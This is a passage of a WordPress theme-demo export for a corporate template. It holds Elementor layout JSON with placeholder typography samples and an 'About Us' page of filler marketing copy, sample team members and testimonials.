downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"552d935","elType":"widget","settings":{"title":"Heading 3","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"eb0c1c1","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"7a7b273","elType":"widget","settings":{"title":"Heading 4","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3cce58e","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"3d16c16","elType":"widget","settings":{"title":"Heading 5","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1782a00","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"22515c1","elType":"widget","settings":{"title":"Heading 6","header_size":"h6","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"aa2835e","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"0e2eb3b","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"4555825","elType":"widget","settings":{"title":"IV Columns","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"e1bd3b8","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"7359c5a","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"f199e08","elType":"widget","settings":{"editor":"<p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"6eacc12","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"bc73054","elType":"widget","settings":{"editor":"<p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"2b7bef0","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"8e362cb","elType":"widget","settings":{"editor":"<p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"9b85fb3","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"52ae6c7","elType":"widget","settings":{"editor":"<p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"aedecf5","elType":"widget","settings":{"title":"III Columns","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"0aaf919","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"c3e0f34","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"67b4e55","elType":"widget","settings":{"editor":"<p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"b8d273a","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"8de19bc","elType":"widget","settings":{"editor":"<p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"097ada7","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"34bf2f6","elType":"widget","settings":{"editor":"<p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"a92b63b","elType":"widget","settings":{"title":"II Columns","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"a598d52","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"40c0145","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"50ffc56","elType":"widget","settings":{"editor":"<p>Characterised by its suitability for use in a wide range of contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue, available in pentagonal or hexagonal form and the elements that stand out for their striking backrests in saddle hide.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"69df804","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"415941f","elType":"widget","settings":{"editor":"<p>Characterised by its suitability for use in a wide range of contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue, available in pentagonal or hexagonal form and the elements that stand out for their striking backrests in saddle hide.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"010c8ae","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":30,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"093badb","elType":"widget","settings":{"title":"Text Elements","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"127fad1","elType":"widget","settings":{"editor":"<p>Three of these curves describe an initial Covid-related spike in demand, and three describe a short-term hit. Where each group begins to diverge, however, is in what\u2019s likely to <span style=\"color: #55bb53;\">happen to demand over the next several years.<\/span> Think, for example, of <span style=\"color: #55bb53; font-weight: 600;\">personal computer monitors or other types<\/span> of goods that were declining pre-pandemic and fall into the \u201cshort-term spike, long-term decline\u201d archetype. The story is different for online grocery shopping and collaboration services like Zoom (short-term spike, long-term growth), both of which were growing steadily before the pandemic. <em>Experimentation during the crisis has convinced more and more customers that ordering or meeting online makes sense, pulling forward demand that will likely stick<\/em>.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"ad421e7","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":30,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"4ca1f31","elType":"widget","settings":{"title":"Highlights","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5249e8e","elType":"widget","settings":{"editor":"<p><span style=\"background: #55bb53; color: #fff;\">Most firms have set up a war room to triage<\/span> their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"c9dd334","elType":"widget","settings":{"editor":"<p><span style=\"background: #262832; color: #fff;\">Most firms have set up a war room to triage<\/span> their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"15","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"ff8b1b8","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":30,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"006991d","elType":"widget","settings":{"title":"Dropcaps","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"e9b8646","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"15","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"e41f15a","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"82d3b4a","elType":"widget","settings":{"editor":"<p><span class=\"drop-cap\" style=\"background: #55bb53;\"><span class=\"drop-cap-letter\">M<\/span><\/span>ost firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"ab0df6a","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"336d7e3","elType":"widget","settings":{"editor":"<p><span class=\"drop-cap\"><span class=\"drop-cap-letter\">M<\/span><\/span>ost firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"9c81ff3","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":30,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"55e9a19","elType":"widget","settings":{"title":"Listings","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"297dfb9","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"8d62022","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"b9ca8ad","elType":"widget","settings":{"editor":"<ol><li>Customer Experience<\/li><li>New Business Innovation<\/li><li>Sales and Marketing<\/li><\/ol>","text_color":"#5F5F5F","typography_typography":"custom","typography_font_family":"Open Sans","typography_font_weight":"400","typography_line_height":{"unit":"px","size":42,"sizes":[]},"__globals__":{"text_color":""}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"7b081bc","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"0cf1b0f","elType":"widget","settings":{"editor":"<ul><li>Customer Experience<\/li><li>New Business Innovation<\/li><li>Sales and Marketing<\/li><\/ul>","text_color":"#5F5F5F","typography_typography":"custom","typography_font_family":"Open Sans","typography_font_weight":"400","typography_line_height":{"unit":"px","size":42,"sizes":[]},"__globals__":{"text_color":""}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"6f037fd","elType":"column","settings":{"_column_size":25,"_inline_size":null,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"f728999","elType":"widget","settings":{"icon_list":[{"text":"Customer Experience","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/down-arrow.svg","id":480},"library":"svg"},"_id":"6733193"},{"text":"New Business Innovation","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/down-arrow.svg","id":480},"library":"svg"},"_id":"7a2cb9d"},{"text":"Sales and Marketing","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/down-arrow.svg","id":480},"library":"svg"},"_id":"51805a9"}],"space_between":{"unit":"px","size":12,"sizes":[]},"icon_color":"#55BB53","icon_size":{"unit":"px","size":11,"sizes":[]},"text_indent":{"unit":"px","size":15,"sizes":[]}},"elements":[],"widgetType":"icon-list"}],"isInner":true},{"id":"6484bff","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"fff55a7","elType":"widget","settings":{"icon_list":[{"text":"Customer Experience","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/add.svg","id":481},"library":"svg"},"_id":"6733193"},{"text":"New Business Innovation","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/add.svg","id":481},"library":"svg"},"_id":"7a2cb9d"},{"text":"Sales and Marketing","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/add.svg","id":481},"library":"svg"},"_id":"51805a9"}],"space_between":{"unit":"px","size":12,"sizes":[]},"icon_color":"#55BB53","icon_size":{"unit":"px","size":11,"sizes":[]},"text_indent":{"unit":"px","size":15,"sizes":[]}},"elements":[],"widgetType":"icon-list"}],"isInner":true}],"isInner":true},{"id":"99d54a9","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":30,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"divider"},{"id":"c5b4eb2","elType":"widget","settings":{"title":"Blockquote","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"0310507","elType":"section","settings":{"gap":"extended","structure":"30","layout":"full_width"},"elements":[{"id":"40df4db","elType":"column","settings":{"_column_size":33,"_inline_size":20},"elements":[],"isInner":true},{"id":"8a5f517","elType":"column","settings":{"_column_size":33,"_inline_size":59.33200000000000073896444519050419330596923828125},"elements":[{"id":"c1a7fe1","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"768ca46","elType":"column","settings":{"_column_size":33,"_inline_size":20},"elements":[],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:6:{s:7:"heading";a:3:{s:5:"count";i:14;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:14;s:11:"header_size";i:13;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:14;}}}}s:11:"text-editor";a:3:{s:5:"count";i:23;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:23;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:9;s:15:"_padding_mobile";i:3;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:2;s:21:"typography_typography";i:2;s:22:"typography_font_family";i:2;s:22:"typography_font_weight";i:2;s:22:"typography_line_height";i:2;}}}}s:7:"divider";a:3:{s:5:"count";i:6;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:2:{s:5:"color";i:6;s:3:"gap";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:6;s:15:"_padding_mobile";i:6;}}}}s:6:"column";a:3:{s:5:"count";i:19;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:1:{s:12:"_inline_size";i:19;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_mobile";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:7;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:2:{s:14:"section_layout";a:2:{s:3:"gap";i:6;s:6:"layout";i:6;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:6;s:14:"padding_mobile";i:2;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:2;s:9:"icon_size";i:2;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:2;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>About Us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/about-us/</link>
		<pubDate>Mon, 07 Sep 2020 09:01:54 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=487</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="630" height="475" src="https://maxbizz.s3.amazonaws.com/images/image1-about-us.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image1-about-us.jpg 630w, https://maxbizz.s3.amazonaws.com/images/image1-about-us-1-300x226.jpg 300w" sizes="(max-width: 630px) 100vw, 630px" />											
	        about company	        <h3>Make Digital Marketing  Work For Your Business</h3>	    
		<p>Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent into the firm, acquiring new companies, and developing new capabilities, for example, in design.</p><hr /><p>We serve clients at every level of their organization, whether as a trusted advisor to top management or as a hands-on coach.</p>		
										<img width="203" height="52" src="https://maxbizz.s3.amazonaws.com/images/signature-home4.png" alt="" loading="lazy" />											
			<h6>Peter Adams</h6>		
		<p>co-founder of company</p>		
        	<h6>Trusted <br>Clients</h6>      				        
        	<h6>Finished <br>Projects</h6>      				        
        	<h6>Years of <br>Experience</h6>      				        
        	<h6>Visited<br>Conferences</h6>      				        
	        what we do	        <h3>Creating Your Startup Business</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
					<a href="#"><img src="https://maxbizz.s3.amazonaws.com/images/features1-about-us.jpg" alt="Accounting &amp; Finance"></a>					
						<h5><a href="#">Accounting & Finance</a></h5>						<p>A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.</p>					
					<a href="#">Explore More</a>				
					<a href="#"><img src="https://maxbizz.s3.amazonaws.com/images/features2-about-us.jpg" alt="Management Skills"></a>					
						<h5><a href="#">Management Skills</a></h5>						<p>A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.</p>					
					<a href="#">Explore More</a>				
					<a href="#"><img src="https://maxbizz.s3.amazonaws.com/images/features3-about-us.jpg" alt="Business Planning"></a>					
						<h5><a href="#">Business Planning</a></h5>						<p>A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.</p>					
					<a href="#">Explore More</a>				
										<img width="516" height="625" src="https://maxbizz.s3.amazonaws.com/images/image2-about-us.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image2-about-us.png 516w, https://maxbizz.s3.amazonaws.com/images/image2-about-us-1-248x300.png 248w" sizes="(max-width: 516px) 100vw, 516px" />											
	        main principles	        <h3>Global Reach with Local  Understanding</h3>	    
		<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.</p>		
	        <h6>marketing analysis</h6>			
	        <h6>finance strategy</h6>			
	        <h6>business innovation</h6>			
		        <a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/01.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/02.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/03.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/04.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/05.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/06.svg" alt=""></figure></a>		    
	        testimonials	        <h3>What People Say About Us</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi1.png" alt="Oliver Simson">
							<h6>Oliver Simson</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
							<h6>Mary Grey</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
							<h6>Samanta Fox</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi1.png" alt="Oliver Simson">
							<h6>Oliver Simson</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
							<h6>Mary Grey</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
							<h6>Samanta Fox</h6>							client of company						
	        our team	        <h3>Our Skilled Leaders</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team1-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Monica Black</h6>				chief communication officer			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team2.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team2-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Peter Perish</h6>				chief business project			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team3.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team3-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Olivia Woodson</h6>				international consultant			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team4.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team4-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Peter Adams</h6>				co-founder of company			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-team">Explore More </a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>487</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 09:01:54]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 09:01:54]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[about-us]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[489]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
